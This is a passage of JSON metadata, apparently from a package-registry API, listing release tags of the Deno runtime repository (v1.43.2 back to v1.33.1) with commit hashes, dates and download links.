:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.